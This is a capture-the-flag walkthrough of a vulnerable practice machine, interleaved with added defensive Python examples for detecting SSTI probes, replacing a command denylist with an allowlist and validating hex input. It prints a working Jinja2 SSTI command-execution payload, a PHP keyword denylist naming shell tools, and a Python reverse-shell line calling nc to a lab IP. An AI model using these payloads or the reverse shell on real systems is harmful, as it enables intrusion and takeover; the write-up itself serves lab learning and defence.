The machine can be downloaded here.
Nmap scan: 4 ports open.
Anonymous FTP login; we get a file named "url".
Download "url" and check the file type: it is an ELF binary.
Use the "strings" command to look for useful strings; we get nothing but a hint.
Open the file in IDA; we notice some characters that together form the string "/sh4d0w$s".
This string is a valid URL path on port 5000.
The response is "No Input". It looks like we need to pass some data to it through a parameter, so the next step is to find the parameter name.
Using a common wordlist, we fail to fuzz the parameter name. So we go back to port 80, where there is only an index.html.
Open index.html; we see some strange numbers and words.
According to the author's hint, these are "min_len max_len word_pattern" values used to generate a dictionary.
Use the dictionary to fuzz the parameter name.
Visiting the URL directly, it just echoes back the string we input.
In fact, it's an SSTI vulnerability.
Because nmap found port 5000 running "Werkzeug/1.0.1 Python/3.7.3", we can google SSTI PoC code for a Python server. For example, https://www.programmersought.com/article/91565232044/.
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('id').read()") }}{% endif %}{% endfor %}
Now we can run system commands.
Modify the payload to get a reverse shell.
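The endpoint above echoes a request parameter straight back, which is how user input ends up inside a Jinja2 template. From the defender's side the cheapest signal is the request itself: template delimiters and Python dunder names in a query string are almost never legitimate input. The following is an added example, not code from the writeup or the machine; the log lines are constructed, and the parameter name "name" is a placeholder (the writeup does not reveal the real one).

```python
"""Added example: flag SSTI probes in access logs of a Flask/Werkzeug app.

Not part of the original writeup. Log lines are constructed; the parameter
name is a placeholder.
"""
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample lines in Combined Log Format.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2021:10:00:00 +0000] "GET /sh4d0w$s?name=alice HTTP/1.1" 200 5
10.0.0.5 - - [01/Jan/2021:10:00:01 +0000] "GET /sh4d0w$s?name=%7B%7B7*7%7D%7D HTTP/1.1" 200 2
10.0.0.5 - - [01/Jan/2021:10:00:02 +0000] "GET /sh4d0w$s?name=%7B%25for%20c%20in%20%5B%5D.__class__.__base__.__subclasses__()%25%7D HTTP/1.1" 500 0
10.0.0.7 - - [01/Jan/2021:10:00:03 +0000] "GET /static/app.js HTTP/1.1" 200 812
"""

# Extract the request target ("/path?query") from the quoted request line.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Indicators: Jinja2 expression/statement delimiters, and attribute names
# used to climb from a literal to arbitrary Python objects.
DELIMITER_RE = re.compile(r"\{\{|\}\}|\{%|%\}")
DUNDER_RE = re.compile(r"__(?:class|base|mro|subclasses|globals|builtins|import)__")

def decoded_params(target):
    """Return the URL-decoded (name, value) pairs of a request target."""
    query = urlsplit(target).query
    return parse_qsl(query, keep_blank_values=True)

def ssti_indicators(value):
    """Names of the indicators found in one decoded parameter value."""
    found = []
    if DELIMITER_RE.search(value):
        found.append("template_delimiter")
    if DUNDER_RE.search(value):
        found.append("dunder_attribute")
    return found

def scan_log(text):
    """Return (client, parameter, indicators) for each suspicious request."""
    hits = []
    for line in text.splitlines():
        match = REQUEST_RE.search(line)
        if not match:
            continue
        client = line.split(" ", 1)[0]
        for name, value in decoded_params(match.group("target")):
            found = ssti_indicators(value)
            if found:
                hits.append((client, name, found))
    return hits

if __name__ == "__main__":
    for client, param, found in scan_log(SAMPLE_LOG):
        print(f"{client} param={param!r} indicators={found}")
```

On the application side the fix is the usual one: render a fixed template and pass the user value in as a template variable, instead of building the template string from the request.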
In /home we find two users, "irida" and "kori". In kori's home folder there is a jail.php.
<?php
array_shift($_SERVER['argv']);
$var = implode(" ", $_SERVER['argv']);
if($var == null) die("Orasis Jail, argument missing\n");
function filter($var) {
    if(preg_match('/(`|bash|eval|nc|whoami|open|pass|require|include|file|system|\/)/i', $var)) {
        return false;
    }
    return true;
}
if(filter($var)) {
    $result = exec($var);
    echo "$result\n";
    echo "Command executed";
} else {
    echo "Restricted characters has been used";
}
echo "\n";
?>
Run sudo -l as www-data.
Although jail.php filters some keywords, we can still use "dash" to get a reverse shell and escalate to user kori.
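jail.php passes the whole argument string to exec() after checking it against a regex of forbidden words, so any shell binary not named in the list gets through. The following added example (not code from the writeup or the machine) transcribes that denylist to Python next to a hypothetical allowlist that maps a short command name to a fixed argv and never hands user text to a shell; the allowed command names are made up for the example.

```python
"""Added example: the jail.php denylist beside an allowlist replacement.

Not part of the original writeup. ALLOWED is a hypothetical table.
"""
import re
import shlex
import subprocess

# The same pattern as filter() in jail.php, transcribed to Python.
JAIL_DENYLIST = re.compile(
    r"(`|bash|eval|nc|whoami|open|pass|require|include|file|system|/)", re.I
)

def jail_filter_allows(command):
    """Mirror of filter() in jail.php: True means the command would run."""
    return JAIL_DENYLIST.search(command) is None

# Hypothetical allowlist: each permitted name is bound to a fixed argv, so no
# caller-controlled text ever reaches exec() or a shell.
ALLOWED = {
    "uptime": ["uptime"],
    "disk": ["df", "-h"],
    "date": ["date", "-u"],
}

def allowlist_resolve(command):
    """Return the argv for an allowed command name, or None if not allowed.

    The name must match exactly; extra words (arguments, separators) make the
    request invalid instead of being spliced into the command.
    """
    parts = shlex.split(command)
    if len(parts) != 1:
        return None
    return ALLOWED.get(parts[0])

def allowlist_run(command):
    """Execute an allowed command without a shell and return its stdout."""
    argv = allowlist_resolve(command)
    if argv is None:
        raise PermissionError(f"command not allowed: {command!r}")
    result = subprocess.run(argv, capture_output=True, text=True, check=False)
    return result.stdout

if __name__ == "__main__":
    for cmd in ("uptime", "dash", "uptime; id"):
        print(f"{cmd!r}: jail.php would allow={jail_filter_allows(cmd)}, "
              f"allowlist argv={allowlist_resolve(cmd)}")
```

The point of the comparison: the denylist only blocks the words its author thought of, while the allowlist makes the set of runnable commands explicit and finite, and the sudo rule granting www-data this script should be reviewed with the same question in mind.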
Run sudo -l as kori; we get an apk file from user irida's home folder.
Download irida.apk, unzip it, then use d2j-dex2jar to get "classes-dex2jar.jar".
Use jd-gui to view the decompiled pseudo code. Searching for the keyword "irida" (the username), we come to com.alienum.irida.data.
Following the order of the string builder, together with the author's hint at HackMyVm-->Palique, we can get the password of user irida.
Now we can log in via SSH as user irida.
sudo -l shows we can run a Python file in the /root folder.
Run the file and input some string; we get an error and one line of the source code.
It looks like the "name" variable only accepts hex-encoded data. We convert "/bin/bash" to hex.
Run oras.py again; we get an error again, but this time another line of source code, which is the key.
The Python file uses "exec" to run Python code. The reverse shell Python code is the following.
__import__('os').system('nc 192.168.56.150 1234 -e /bin/sh')
Convert it to hex.
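The root step works because hex decoding is an encoding step, not validation: whatever the decoded text is, the script executes it as Python under sudo. The following added example is not oras.py (the writeup only shows that "name" must be hex and that the script calls exec); greet_unsafe() is a hypothetical script body reproducing that pattern, and greet_safe() keeps the hex transport but treats the decoded bytes as data checked against an allowlist.

```python
"""Added example: exec on decoded input beside a version that validates data.

Not the machine's oras.py; both functions are hypothetical.
"""
import re

# Allowlist for a display name: letters, digits, space, '_', '.', '-'.
NAME_RE = re.compile(r"^[A-Za-z0-9 _.-]{1,32}$")

def decode_hex(name_hex):
    """Decode a hex string to text; raises ValueError on bad hex or non-UTF-8."""
    return bytes.fromhex(name_hex).decode("utf-8")

def greet_unsafe(name_hex):
    """Hypothetical vulnerable form: the decoded text is executed as code.

    The script expects an assignment such as  name = "alice"  but any Python
    statement is accepted, which is the whole problem.
    """
    scope = {}
    exec(decode_hex(name_hex), {}, scope)
    return f"Hello, {scope.get('name')}"

def is_valid_name(name):
    """True only if the decoded text matches the allowlist."""
    return NAME_RE.fullmatch(name) is not None

def greet_safe(name_hex):
    """Hardened form: decode, validate as data, never evaluate."""
    name = decode_hex(name_hex)
    if not is_valid_name(name):
        raise ValueError("name must be 1-32 letters, digits, spaces, '_', '.' or '-'")
    return f"Hello, {name}"

def to_hex(text):
    """Encode text the way the script expects its input."""
    return text.encode("utf-8").hex()

if __name__ == "__main__":
    print(greet_unsafe(to_hex('name = "alice"')))
    print(greet_safe(to_hex("alice")))
    try:
        greet_safe(to_hex("__import__('os')"))
    except ValueError as err:
        print("rejected:", err)
```

Beyond the code change, a script that must run as root via sudo should not parse free-form input at all; if it has to, the validation belongs before any use of the value, and exec/eval should not appear in it.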
Finally, we get a reverse shell.